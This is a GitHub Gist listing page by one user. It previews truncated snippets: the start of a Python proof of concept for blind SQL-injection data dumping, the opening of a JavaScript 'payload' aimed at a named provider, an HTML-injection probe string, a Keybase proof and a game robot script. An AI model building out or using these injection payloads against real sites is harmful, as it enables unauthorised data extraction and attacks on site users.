Skip to content

Instantly share code, notes, and snippets.

@cyberpunkych
cyberpunkych / poc.py
Created April 20, 2016 20:20
PoC for fast Blind SQL-Injection dumping
import socket, time, re, sys
from multiprocessing.dummy import Pool as ThreadPool
bad_answ = """<table>
</table>"""
good_answ = """<table>
<tr>
<td></td>
<td></td>
@cyberpunkych
cyberpunkych / payload_yota.js
Last active November 11, 2015 17:35
Yota payload
document.body.onload=""
function getXmlHttp(){
var xmlhttp;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {

Keybase proof

I hereby claim:

  • I am cyberpunkych on github.
  • I am cyberpunkych (https://keybase.io/cyberpunkych) on keybase.
  • I have a public key whose fingerprint is AE35 1ED2 FE8A 0E0A F98C 59F1 19F4 336C 7B9A 83D6

To claim this, I am signing this object:

@cyberpunkych
cyberpunkych / "><h1>2'><h1>2
Created February 5, 2014 12:47
"><h1>2'><h1>2
"><h1>2'><h1>2
@cyberpunkych
cyberpunkych / robot.js
Created December 4, 2012 14:36
hello-Robot
//FightCode can only understand your robot
//if its class is called Robot
var Robot = function(robot) {
};
Robot.prototype.onIdle = function(ev) {
var robot = ev.robot;
robot.ahead(500);